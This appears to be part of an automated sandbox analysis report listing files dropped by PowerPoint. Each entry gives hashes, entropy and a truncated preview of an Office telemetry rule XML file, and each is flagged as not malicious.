                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="880000" V="1" DC="SM" EN="Office.UserFacts.CreativeContentSeen" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="biyhq" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="EventName" />.. </L>.. <R>.. <V V="Office.Graphics.M365ContentPicker.GeneralInfo" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <O T="COALESCE">.. <L>.. <S T="1" F="Data.RequestType" M="Ignore" />.. </L>.. <R>.. <V V="NotInitialLoad" T="W" />.. </R>.. </O>.. </L>.. <R>.. <V V="InitialLoad" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false" N="DataType">.. <V
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1053
                                                                                                                              Entropy (8bit):3.998522798067614
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdpaljeqAQXerHN+u/lOaNe8tNH/M//H6jXhsK5eNX/c//aNezPNuGbXF3/8/v:2dsljcrH8uXhHLrITQP1x6qc
                                                                                                                              MD5:E4493FC3DAFC0E938F16CF6AB318AC4D
                                                                                                                              SHA1:EB425039CE19CA097E27AF28889DC774EFE95AE0
                                                                                                                              SHA-256:E028F18286111B536B5080F99C146B9AA4A1E0F7FEEDBEF35DBB93FBAD507601
                                                                                                                              SHA-512:F22CB10DC2A6DFB92230181A70D7E692A1FEA6D6A25E290B6EC2B83492AE7F3C02B63254BE3AD11AE579A7BF7FAA86D28D14A63002B547969D1DC1AE6D67CE41
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="880001" V="1" DC="SM" EN="Office.UserFacts.CreativeContentTried" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="biyhq" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="EventName" />.. </L>.. <R>.. <V V="Office.Graphics.M365ContentPicker.Insert" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <O T="COALESCE">.. <L>.. <S T="1" F="Data.ContentTier" M="Ignore" />.. </L>.. <R>.. <V V="NotPremium" T="W" />.. </R>.. </O>.. </L>.. <R>.. <V V="premium" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false" N="DataType">.. <V V="3" T="U3
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):555
                                                                                                                              Entropy (8bit):4.772820693771853
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdoXLHAQXerHN+u/qNOstNX/c//3qS39pONGIfdNOjsu:2doXCrH8uyRXaKc
                                                                                                                              MD5:1F6FEFDC1275EC12C2C978E03360217B
                                                                                                                              SHA1:38CE0630BA639BD52F574728B320CC6B4AC8EA9E
                                                                                                                              SHA-256:BE88A59224FA00F7A731620D745D91081D245366B8590667A25C52F7D3269CC0
                                                                                                                              SHA-512:2A21A53E97FD2728C19B7B69328C1995C23C27E09C5405D419327F68292F4E31A478B21AE06F99ACAD8B8EEF6FD51C7DC9D8E307867D8B792E7524D53C3C5C8E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="880015" V="0" DC="SM" EN="Office.UserFacts.LiveCaptionsSeen" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="biyhq" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="EventName" />.. </L>.. <R>.. <V V="Office.PowerPoint.PPTLiveSubtitlesSession.SubtitleMetrics" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false" N="DataType">.. <V V="3" T="U32" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1064
                                                                                                                              Entropy (8bit):4.034943189563685
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdpLDYAQXerHN+u/lOaNe8tNH/M//HqS395eNX/c//hH/ezPNuP3/8//8JuNHU:2dpZrH8uXhHqehP2+vc
                                                                                                                              MD5:88ACE6647FE7CBD180FCF2BDE1276ED9
                                                                                                                              SHA1:AF7F0E45615A7E31C5614C44BF808A73EF5DF876
                                                                                                                              SHA-256:21C1B4DAF29FDC2BDF18A6FB7E6D685C67F4481BC4863DB1B58B7447AB1C4722
                                                                                                                              SHA-512:DF50D3924E5706ABDFBAE00A6578CEB703177570E99A06810BE5211422A117305230EFD4E0259841A719E65E23375810D055A32C0834B83ED9419C7DF9A341E0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="880016" V="0" DC="SM" EN="Office.UserFacts.LiveCaptionsTried" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="biyhq" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="EventName" />.. </L>.. <R>.. <V V="Office.PowerPoint.PPTLiveSubtitlesSession.SubtitleMetrics" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="GT">.. <L>.. <O T="COALESCE">.. <L>.. <S T="1" F="Data.FirstAudioDelayInMs" M="Ignore" />.. </L>.. <R>.. <V V="0" T="U64" />.. </R>.. </O>.. </L>.. <R>.. <V V="0" T="U64" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false" N="DataType">.. <V
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1074
                                                                                                                              Entropy (8bit):4.061559435834553
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdQL7mAQXerHN+u/lOaNe8tNH/M//HqS395eNX/c//hH/ezPNuMz3K3/8//8JX:2dQ3rH8uXhHqehPHK+vc
                                                                                                                              MD5:C19E2CD69B5E0414AC4EAEB22C494CEC
                                                                                                                              SHA1:52E817EC264528B3E46BF0B2426848D3DC7D89F1
                                                                                                                              SHA-256:91CD3CBCB509E771850F6A5B52C5F9318810C2B56AB238096437F2CF2EAABE45
                                                                                                                              SHA-512:21A1A965C08C79874DF2C7FFB7C78A3F79BEF44C42F7E56F9A480D7DCCA8EE70D65286095715016A5AEB224B1F2DC2887C6C170BDA38B1E781CA354D99BD8E6C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="880017" V="0" DC="SM" EN="Office.UserFacts.LiveCaptionsKept" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="biyhq" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="EventName" />.. </L>.. <R>.. <V V="Office.PowerPoint.PPTLiveSubtitlesSession.SubtitleMetrics" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="GT">.. <L>.. <O T="COALESCE">.. <L>.. <S T="1" F="Data.CountCaptionCharactersReceived" M="Ignore" />.. </L>.. <R>.. <V V="0" T="U64" />.. </R>.. </O>.. </L>.. <R>.. <V V="0" T="U64" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false" N="DataType"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):542
                                                                                                                              Entropy (8bit):4.726610360558981
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdOaAQXerHN+u/qNOstNX/c//33zbpONGIfdNOjsu:2dOjrH8uyRXFc
                                                                                                                              MD5:7C02A32A1F9ED94F3713E7A7AA0E3FF7
                                                                                                                              SHA1:B3BD58F39BFAE552136EA1D85344F35DC0E4F88E
                                                                                                                              SHA-256:FB3521DCF8AAD6DB54FE3FD4D8459C717AA7236547FCB257E5A23393404AAA2E
                                                                                                                              SHA-512:41AA74471746917982C7935D8409D2A4C2EB8DEEF50A196FBF3AE49F117EE37C08936BFF8C70A06874A36DD845FBA94B4FBAD5471F4D3BA7C1A00FFF8CF1B9E3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="880020" V="0" DC="SM" EN="Office.UserFacts.PresenterCoachSeen" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="biyhq" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="EventName" />.. </L>.. <R>.. <V V="Office.PowerPoint.Rehearsal.SessionMetrics" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false" N="DataType">.. <V V="3" T="U32" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):880
                                                                                                                              Entropy (8bit):4.254992160336294
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdHXTAQXerHN+u/lOaNe8tNH/M//H3zb5eNX/c//jPNeEKWnH/M//rLM5eNpOU:2dHXarH8uXhH3EPAWHy0c
                                                                                                                              MD5:311B3BD0781B95EF344703CF46C4E3EA
                                                                                                                              SHA1:60B184CF058B758D582098728CC709DF80044FF7
                                                                                                                              SHA-256:B32961CB4651F9696CD3C466F226410F40BB0BEC97FEA28C6DE1EAC0A2CB8FB2
                                                                                                                              SHA-512:7989EAC5D7193A188FC093CFE1866F6455F426C9D10285DF25BD13876769029E23FE7A3EF6F52E1EE4403B3E4A34606B80625AF28F0CFC294AEC66B8F660CB03
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="880021" V="0" DC="SM" EN="Office.UserFacts.PresenterCoachTried" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="biyhq" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="EventName" />.. </L>.. <R>.. <V V="Office.PowerPoint.Rehearsal.SessionMetrics" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="COALESCE">.. <L>.. <S T="1" F="Data.AudioStreamingStarted" M="Ignore" />.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false" N="DataType">.. <V V="3" T="U32" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1059
                                                                                                                              Entropy (8bit):4.013508743358617
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdD4MmAQXerHN+u/lOaNe8tNH/M//H3zb5eNX/c//hH/ezPNuCJ5hBjn3/8//s:2dD4qrH8uXhH3hPl/BLLsc
                                                                                                                              MD5:FCCEFE0A7179E1D4E226FE867B204C5C
                                                                                                                              SHA1:CC744CF3C7B3E47C7514151568FBD44D494068D9
                                                                                                                              SHA-256:3EC077D625C56B6040EE07BA01B148F8FDF40322273FB156A25E42A410ED3CAA
                                                                                                                              SHA-512:097FF197A322AD2F29FDECF82DE9B17555AE6BCC272F7C5DD254821502945189502A7E5E4F7E9F172079E776519C3541C5BFC5B60382BDCAAD1DA4A5D033F9C0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="880022" V="0" DC="SM" EN="Office.UserFacts.PresenterCoachKept" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="biyhq" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="EventName" />.. </L>.. <R>.. <V V="Office.PowerPoint.Rehearsal.SessionMetrics" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="GT">.. <L>.. <O T="COALESCE">.. <L>.. <S T="1" F="Data.CoachCritiquesDisplayedCount" M="Ignore" />.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false" N="DataType">.. <V V="3"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):634
                                                                                                                              Entropy (8bit):4.712038068989999
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHda4vtAQXerHN+u/qNOstNX/c//VmqpONdGKNXmAChLIfdNOcsu:2d9vkrH8uyRXGKNWAlJ
                                                                                                                              MD5:FD38A6339D2856F3125C1981ED0D725B
                                                                                                                              SHA1:3DE9AC96CE7E843EC0E3BFFD0901E885A3709245
                                                                                                                              SHA-256:2D91A5009E39D292F12B533EEB1A00E014DB9E3098AFDF8A2C6EAD6594794CB8
                                                                                                                              SHA-512:2254A2B09615C351F0954178FB80A6B3E6157F4AD037F7BD35D6CE8E05172EF878BF562C119A83AA790D9A244A6C974165C8439950AB3BEE1419235929205348
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="880023" V="0" DC="SM" EN="Office.UserFacts.TemplatesSeen" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="biyhq" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="EventName" />.. </L>.. <R>.. <V V="Office.Docs.OfficeStart.DocumentTemplateList.TemplateSelected" T="W" />.. </R>.. </O>.. </F>.. <SR T="3" R="^TM">.. <S T="2" F="Data.SafeTemplateId" />.. </SR>.. </S>.. <C T="U32" I="0" O="false" N="DataType">.. <V V="3" T="U32" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):637
                                                                                                                              Entropy (8bit):4.745302370768016
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdyvhnYAQXerHN+u/qNOstNX/c//XpONdGKNXmAChLIfdNOcsu:2dyvjrH8uyRXOKNWAlJ
                                                                                                                              MD5:42BF882EA87F1ED17F920519AA4CDA38
                                                                                                                              SHA1:00D8E6A30C3E00D4881DFE444E83319C095F8D3D
                                                                                                                              SHA-256:8401F9E70F46793730BBEE5FB364D7D3A6233FC81D9E84033162FF970150CEED
                                                                                                                              SHA-512:D567013F6B9D06E5D249A259C4EF70AAEBF99FFF0CE72AF44D4A108442D6385D27F3CF04E8A362212AFBEFF8A3F8C8D1E2CA0BE2FDA18321750B58E6329720C8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="880024" V="0" DC="SM" EN="Office.UserFacts.TemplatesTried" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="biyhq" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="EventName" />.. </L>.. <R>.. <V V="Office.Docs.OfficeStart.DocumentTemplateList.TemplateTakeAction" T="W" />.. </R>.. </O>.. </F>.. <SR T="3" R="^TM">.. <S T="2" F="Data.SafeTemplateId" />.. </SR>.. </S>.. <C T="U32" I="0" O="false" N="DataType">.. <V V="3" T="U32" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):855
                                                                                                                              Entropy (8bit):4.992943901171179
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdt9ynFVkHzpRtRVHvAQjerPW/+u/5lOES1c/NX/c//+pONLjsfTS12xP6+/TI:2dzynFVOLzorPFunuc/Jks7u2Rbuc/qj
                                                                                                                              MD5:A87FAB872DC651710C78C6A9EDB7B568
                                                                                                                              SHA1:40C9AC6D5CAF4A2119924B52944C8A6C2243A256
                                                                                                                              SHA-256:1EBCF0BA9F86FC852D094DDA1B13C5B61BBC8BFF8832213E1C56222D12661E1C
                                                                                                                              SHA-512:19D0DB06C86FCC21792E739455353956B4C363BF15D92A89838C6F8F11B6B27045EBAFC1B5A14FC646EFF367942B139C47174C6433AB0E97A358EE89B8BB7231
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="890000" V="2" DC="SM" EN="Office.Privacy.OffersOptIn" ATT="0cc923f8e48042f9b5193007cf34d1ae-def86b84-7392-4e7f-8da6-ecea0a375ec4-7160" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="77rqq" />.. <F T="2">.. <O T="NE">.. <L>.. <S T="1" F="DirectMarketingSettingSourceLocation" />.. </L>.. <R>.. <V V="8" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="U8" I="0" O="false" N="OffersConsentState">.. <S T="2" F="DirectMarketingSettingState" />.. </C>.. <C T="U8" I="1" O="false" N="OffersConsentSourceLocation">.. <S T="2" F="DirectMarketingSettingSourceLocation" />.. </C>.. <C T="U8" I="2" O="false" N="ConsentGroup">.. <S T="2" F="UserConsentGroup" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):991
                                                                                                                              Entropy (8bit):4.852534729172089
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdtu3NP2xVkHzpRtRVKerner1er8OerXergzahIffO9G9+lSGT+9d7yXGUEBI+:2dASVOLzDrergrarOrEw3aO2UGgC162J
                                                                                                                              MD5:E64C5756C5F8BEE7CF937BD78576B04B
                                                                                                                              SHA1:31EC7E2B454C6A2C0A776FA064B92CB1A96638C3
                                                                                                                              SHA-256:FCE8C7CB6CD54FEDAB891BAC2791D1954785AE47B98D9C6340AB303A77A8A1E1
                                                                                                                              SHA-512:501756A98F0DF5B7616CFC941E9FF70E6F2BAC6ECF1465A08EA7E190C5D6D0B92E51160B354A7CCA22748B645AA97D3E0541375569F0EB3C04BE4959A459065B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="890002" V="0" DC="SM" EN="Office.Privacy.UnifiedConsent.API.HttpSendFailureReason" ATT="0cc923f8e48042f9b5193007cf34d1ae-def86b84-7392-4e7f-8da6-ecea0a375ec4-7160" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="48bo8" />.. <UTS T="2" Id="48bo7" />.. <UTS T="3" Id="48bo6" />.. <UTS T="4" Id="495q9" />.. <UTS T="5" Id="48i2c" />.. <US T="6">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. <S T="4" />.. <S T="5" />.. </US>.. </S>.. <C T="TAG" I="0" O="false" N="Tag">.. <S T="6" F="ULS_Tag" />.. </C>.. <C T="I32" I="1" O="true" N="Result">.. <S T="6" F="Result" M="Ignore" />.. </C>.. <C T="U8" I="2" O="true" N="Endpoint">.. <S T="6" F="Endpoint" M="Ignore" />.. </C>.. <C T="U8" I="3" O="true" N="Method">.. <S T="6" F="Method" M="Ignore" />.. </C>.. <C T="I32" I="4" O="true" N="ResponseCode">.. <S T="6" F="Code" M="Ignore" />.. </C>.. <T>.. <S T="6" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1271
                                                                                                                              Entropy (8bit):4.8349878632894505
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2deqEXVOLzDrar0rt2rGr4rirSrFeOw9gOdq1ABR:ceHXVOLzDG4x2qEmOZeOwjd+8
                                                                                                                              MD5:A5CA1FC64A64C3E1FFBC783E656CD0BA
                                                                                                                              SHA1:07CDDEB1B609DB33B23CBAA2291E883846510594
                                                                                                                              SHA-256:52E8F9BC4DF5348A6277E4A833C7BB9C39B9CC6EAD477179D45290C90FB54929
                                                                                                                              SHA-512:F176CB2AE721FF2205E8A5E5B3B0EB5774DB2B38475A4F13504365654BB83E97FEC0C2622AB8F85CECC30481B413EB9CC43B90BE3AA5CC0C72540924B4D6ED18
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="890003" V="1" DC="SM" EN="Office.Privacy.UnifiedConsent.API.CreateHttpRequestFailureReason" ATT="0cc923f8e48042f9b5193007cf34d1ae-def86b84-7392-4e7f-8da6-ecea0a375ec4-7160" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="48bo4" />.. <UTS T="2" Id="48bo3" />.. <UTS T="3" Id="4yvlj" />.. <UTS T="4" Id="4yvli" />.. <UTS T="5" Id="4yvll" />.. <UTS T="6" Id="4yvlk" />.. <UTS T="7" Id="495ry" />.. <UTS T="8" Id="495rx" />.. <US T="9">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. <S T="4" />.. <S T="5" />.. <S T="6" />.. <S T="7" />.. <S T="8" />.. </US>.. </S>.. <C T="TAG" I="0" O="false" N="Tag">.. <S T="9" F="ULS_Tag" />.. </C>.. <C T="U8" I="1" O="true" N="Endpoint">.. <S T="9" F="Endpoint" M="Ignore" />.. </C>.. <C T="U8" I="2" O="true" N="Method">.. <S T="9" F="Method" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="IdentityProvider">.. <S T="9" F="Prov
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):395
                                                                                                                              Entropy (8bit):5.238922111527346
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBdPVVKmkl3mcf1LJL/cUdkTAHzpRsE6KVEDFperhnZkdx486/MveNOn2sby:TMHdt43NLIVkHzpRtRVKer/SWMmNO2su
                                                                                                                              MD5:587FFD728B56B8F98457A2ECFF8B79A5
                                                                                                                              SHA1:3AF515FF69FE49ED760C6D5E0591E37DADDB4D69
                                                                                                                              SHA-256:4EE9188EA332BA457C8552B88DF077207C6706CB8AC929D81FADED03025E0A51
                                                                                                                              SHA-512:6447E1AD791217FA2119053AB8E39E61C5097A58D7FBC5F86DF7D7F7E192E29AC6C2691BE704C8A463907547DE3E4949B50E349F9D01C04C09F3047F2BA0DF85
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="890004" V="0" DC="SM" EN="Office.Privacy.UnifiedConsent.UI.ParseModelPropsFail" ATT="0cc923f8e48042f9b5193007cf34d1ae-def86b84-7392-4e7f-8da6-ecea0a375ec4-7160" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="4yc1x" />.. </S>.. <C T="W" I="0" O="false" N="ErrorMessage">.. <S T="1" F="Message" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):613
                                                                                                                              Entropy (8bit):5.1350527003055335
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdK/ksCSawSCSvAQqWnerfNsmEtadFv15nt9NI7NO2su:2dUYlwTrfNeQ8
                                                                                                                              MD5:E93A3F7C362C08930DF1A31C2DC07DCD
                                                                                                                              SHA1:30A67CB549BA881C211F759E9E53C0506265ABF8
                                                                                                                              SHA-256:7D4B9BAE5416E2C11EE97C85A52E25399B6807DEB9AED4614F00D402B9A75CC5
                                                                                                                              SHA-512:53253490BD2D6502F01696B1D017492E12E08DF6A8DEA61088CB108AD88AF3A7E07C593F44AAC3AB6737909D8D63F5493FFDD5E9D921928B117E4AF816F90FCF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="90117" V="1" DC="SM" EN="Office.Telemetry.InvalidDataFieldName" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" DL="A" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bqca9" />.. </S>.. <C T="W" I="0" O="true" N="EventName">.. <S T="1" F="EventName" M="Ignore" />.. </C>.. <C T="W" I="1" O="false" N="DataFieldName">.. <S T="1" F="DataFieldName" />.. </C>.. <C T="B" I="2" O="true" N="IsRuleEvent">.. <S T="1" F="IsRuleEvent" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):598
                                                                                                                              Entropy (8bit):5.1438660018382025
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdKqm4KlCSawSCSvAQ4WnerqsmEtadFv15r9LnoNO2su:2dVmWlwLrqeQk
                                                                                                                              MD5:15026FBAF6581B344DB36463667B6080
                                                                                                                              SHA1:4CDF73D92318DDF4BF9694A31E94EC261A48548C
                                                                                                                              SHA-256:7BE56FAF8FECF3A05FCE1CA94BC948186DFCDD5815E32847F874AD22F3CD86B3
                                                                                                                              SHA-512:73D1265CCBBB26D266F818E16AC84BA8BE4CC57F7390819F21FED0C5B41B7A119CABBAA26B9A6CA3AA1E7C94AC2B89333D1370880447A0E4FE7C795D44B09B3B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="90118" V="1" DC="SM" EN="Office.Telemetry.TooLongDataFieldName" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="brt7j" />.. </S>.. <C T="W" I="0" O="true" N="EventName">.. <S T="1" F="EventName" M="Ignore" />.. </C>.. <C T="W" I="1" O="false" N="DataFieldName">.. <S T="1" F="DataFieldName" />.. </C>.. <C T="U16" I="2" O="true" N="Length">.. <S T="1" F="Length" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):622
                                                                                                                              Entropy (8bit):5.138423191976508
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdK1kAmjSawSCSvAQqWnerLsmEtadrFbmMnt9NI7NO2su:2dKHMlwTrLeQrRu
                                                                                                                              MD5:7DE02652297BEE60BF6AB2EC192CDF72
                                                                                                                              SHA1:36A03D3AD7F9556F3DFA7B4F17FB32C0D3994EB0
                                                                                                                              SHA-256:6591703BC5D3AD4C7CD26A0559C3A43F8FF15CCC1390FECA70DB7C3BFF9A7677
                                                                                                                              SHA-512:E7814AC30B9A7ABE975FC1CB3C7EC8A8034C7CB4E70A53B4D6541A0B775C79CBEBF30BFBF3A1B7463A72C503A650F51FFAFE8E0B0552266F1B28166186F08A0C
                                                                                                                              Malicious:false
